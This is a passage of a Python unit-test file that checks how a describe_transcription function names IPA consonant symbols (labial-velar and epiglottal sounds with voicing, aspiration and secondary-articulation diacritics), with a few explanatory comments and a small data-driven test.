# voiced palatalized labial-velar approximant pulmonic egressive consonant
def test_wʲ_is_the_representation_of_the_voiced_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʲ")
self.assertEqual(actual, expected)
# voiced velarized labial-velar approximant pulmonic egressive consonant
def test_wˠ_is_the_representation_of_the_voiced_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labial-velar approximant pulmonic egressive consonant
def test_wˤ_is_the_representation_of_the_voiced_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wˤ")
self.assertEqual(actual, expected)
# voiced aspirated labial-velar approximant pulmonic egressive consonant
def test_wʰ_is_the_representation_of_the_voiced_aspirated_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰ")
self.assertEqual(actual, expected)
def test_w̬ʰ_is_the_representation_of_the_voiced_aspirated_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labial-velar approximant pulmonic egressive consonant
def test_wʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰʷ")
self.assertEqual(actual, expected)
def test_w̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labial-velar approximant pulmonic egressive consonant
def test_wʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰʲ")
self.assertEqual(actual, expected)
def test_w̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labial-velar approximant pulmonic egressive consonant
def test_wʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰˠ")
self.assertEqual(actual, expected)
def test_w̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labial-velar approximant pulmonic egressive consonant
def test_wʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰˤ")
self.assertEqual(actual, expected)
def test_w̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰˤ")
self.assertEqual(actual, expected)
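# The secondary-articulation suffixes used throughout are IPA spacing
# modifier letters. A hypothetical lookup table mirroring the wording of the
# expected descriptions above (illustrative only):
_SECONDARY_ARTICULATION_NAMES = {
    "\u02b7": "labialized",      # ʷ MODIFIER LETTER SMALL W
    "\u02b2": "palatalized",     # ʲ MODIFIER LETTER SMALL J
    "\u02e0": "velarized",       # ˠ MODIFIER LETTER SMALL GAMMA
    "\u02e4": "pharyngealized",  # ˤ MODIFIER LETTER SMALL REVERSED GLOTTAL STOP
}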
# voiceless labial-velar fricative pulmonic egressive consonant
def test_ʍ_is_the_representation_of_the_voiceless_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ")
self.assertEqual(actual, expected)
def test_ʍ̊_is_the_representation_of_the_voiceless_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊")
self.assertEqual(actual, expected)
def test_ʍ̥_is_the_representation_of_the_voiceless_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥")
self.assertEqual(actual, expected)
# voiceless labialized labial-velar fricative pulmonic egressive consonant
def test_ʍʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʷ")
self.assertEqual(actual, expected)
def test_ʍ̊ʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊ʷ")
self.assertEqual(actual, expected)
def test_ʍ̥ʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labial-velar fricative pulmonic egressive consonant
def test_ʍʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʲ")
self.assertEqual(actual, expected)
def test_ʍ̊ʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊ʲ")
self.assertEqual(actual, expected)
def test_ʍ̥ʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labial-velar fricative pulmonic egressive consonant
def test_ʍˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍˠ")
self.assertEqual(actual, expected)
def test_ʍ̊ˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊ˠ")
self.assertEqual(actual, expected)
def test_ʍ̥ˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labial-velar fricative pulmonic egressive consonant
def test_ʍˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍˤ")
self.assertEqual(actual, expected)
def test_ʍ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊ˤ")
self.assertEqual(actual, expected)
def test_ʍ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labial-velar fricative pulmonic egressive consonant
def test_ʍʰ_is_the_representation_of_the_voiceless_aspirated_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labial-velar fricative pulmonic egressive consonant
def test_ʍʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labial-velar fricative pulmonic egressive consonant
def test_ʍʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labial-velar fricative pulmonic egressive consonant
def test_ʍʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labial-velar fricative pulmonic egressive consonant
def test_ʍʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰˤ")
self.assertEqual(actual, expected)
# voiced labial-velar fricative pulmonic egressive consonant
def test_ʍ̬_is_the_representation_of_the_voiced_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬")
self.assertEqual(actual, expected)
# voiced labialized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʷ_is_the_representation_of_the_voiced_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʲ_is_the_representation_of_the_voiced_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ˠ_is_the_representation_of_the_voiced_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰ_is_the_representation_of_the_voiced_aspirated_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰˤ")
self.assertEqual(actual, expected)
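# Because "ʍ" is itself a voiceless letter, the voiceless fricative groups
# above accept three spellings (bare, with U+030A, with U+0325) rather than
# two; with the hypothetical helper sketched earlier this collapses to e.g.:
#
#     self._check_equivalent_transcriptions(
#         ("ʍ", "ʍ̊", "ʍ̥"),
#         "voiceless labial-velar fricative pulmonic egressive consonant",
#     )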
# voiceless epiglottal plosive pulmonic egressive consonant
def test_ʡ_is_the_representation_of_the_voiceless_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ")
self.assertEqual(actual, expected)
def test_ʡ̊_is_the_representation_of_the_voiceless_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊")
self.assertEqual(actual, expected)
def test_ʡ̥_is_the_representation_of_the_voiceless_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥")
self.assertEqual(actual, expected)
# voiceless labialized epiglottal plosive pulmonic egressive consonant
def test_ʡʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʷ")
self.assertEqual(actual, expected)
def test_ʡ̊ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊ʷ")
self.assertEqual(actual, expected)
def test_ʡ̥ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized epiglottal plosive pulmonic egressive consonant
def test_ʡʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʲ")
self.assertEqual(actual, expected)
def test_ʡ̊ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊ʲ")
self.assertEqual(actual, expected)
def test_ʡ̥ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized epiglottal plosive pulmonic egressive consonant
def test_ʡˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡˠ")
self.assertEqual(actual, expected)
def test_ʡ̊ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊ˠ")
self.assertEqual(actual, expected)
def test_ʡ̥ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized epiglottal plosive pulmonic egressive consonant
def test_ʡˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡˤ")
self.assertEqual(actual, expected)
def test_ʡ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊ˤ")
self.assertEqual(actual, expected)
def test_ʡ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated epiglottal plosive pulmonic egressive consonant
def test_ʡʰ_is_the_representation_of_the_voiceless_aspirated_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized epiglottal plosive pulmonic egressive consonant
def test_ʡʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized epiglottal plosive pulmonic egressive consonant
def test_ʡʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized epiglottal plosive pulmonic egressive consonant
def test_ʡʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized epiglottal plosive pulmonic egressive consonant
def test_ʡʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰˤ")
self.assertEqual(actual, expected)
# voiced epiglottal plosive pulmonic egressive consonant
def test_ʡ̬_is_the_representation_of_the_voiced_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬")
self.assertEqual(actual, expected)
# voiced labialized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʷ_is_the_representation_of_the_voiced_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʲ_is_the_representation_of_the_voiced_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ˠ_is_the_representation_of_the_voiced_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰ_is_the_representation_of_the_voiced_aspirated_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰˤ")
self.assertEqual(actual, expected)
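# The per-symbol methods above are exhaustive but highly repetitive. A
# minimal data-driven sketch of the same checks, using unittest's subTest
# so each (transcription, description) pair is reported separately; the
# pairs are copied from the cases above and the method name is illustrative:
def test_epiglottal_plosive_descriptions_data_driven(self):
    cases = [
        ("ʡʰ", "voiceless aspirated epiglottal plosive pulmonic egressive consonant"),
        ("ʡ̬", "voiced epiglottal plosive pulmonic egressive consonant"),
        ("ʡ̬ʰˤ", "voiced aspirated pharyngealized epiglottal plosive pulmonic egressive consonant"),
    ]
    for transcription, description in cases:
        with self.subTest(transcription=transcription):
            self.assertEqual(describe_transcription(transcription), description)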
# voiceless epiglottal fricative pulmonic egressive consonant
def test_ʜ_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ")
self.assertEqual(actual, expected)
def test_ʜ̊_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊")
self.assertEqual(actual, expected)
def test_ʜ̥_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥")
self.assertEqual(actual, expected)
def test_ʢ̊_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊")
self.assertEqual(actual, expected)
def test_ʢ̥_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥")
self.assertEqual(actual, expected)
# voiceless labialized epiglottal fricative pulmonic egressive consonant
def test_ʜʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʷ")
self.assertEqual(actual, expected)
def test_ʜ̊ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊ʷ")
self.assertEqual(actual, expected)
def test_ʜ̥ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥ʷ")
self.assertEqual(actual, expected)
def test_ʢ̊ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʷ")
self.assertEqual(actual, expected)
def test_ʢ̥ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized epiglottal fricative pulmonic egressive consonant
def test_ʜʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʲ")
self.assertEqual(actual, expected)
def test_ʜ̊ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊ʲ")
self.assertEqual(actual, expected)
def test_ʜ̥ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥ʲ")
self.assertEqual(actual, expected)
def test_ʢ̊ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʲ")
self.assertEqual(actual, expected)
def test_ʢ̥ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized epiglottal fricative pulmonic egressive consonant
def test_ʜˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜˠ")
self.assertEqual(actual, expected)
def test_ʜ̊ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊ˠ")
self.assertEqual(actual, expected)
def test_ʜ̥ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥ˠ")
self.assertEqual(actual, expected)
def test_ʢ̊ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ˠ")
self.assertEqual(actual, expected)
def test_ʢ̥ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized epiglottal fricative pulmonic egressive consonant
def test_ʜˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜˤ")
self.assertEqual(actual, expected)
def test_ʜ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊ˤ")
self.assertEqual(actual, expected)
def test_ʜ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥ˤ")
self.assertEqual(actual, expected)
def test_ʢ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ˤ")
self.assertEqual(actual, expected)
def test_ʢ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated epiglottal fricative pulmonic egressive consonant
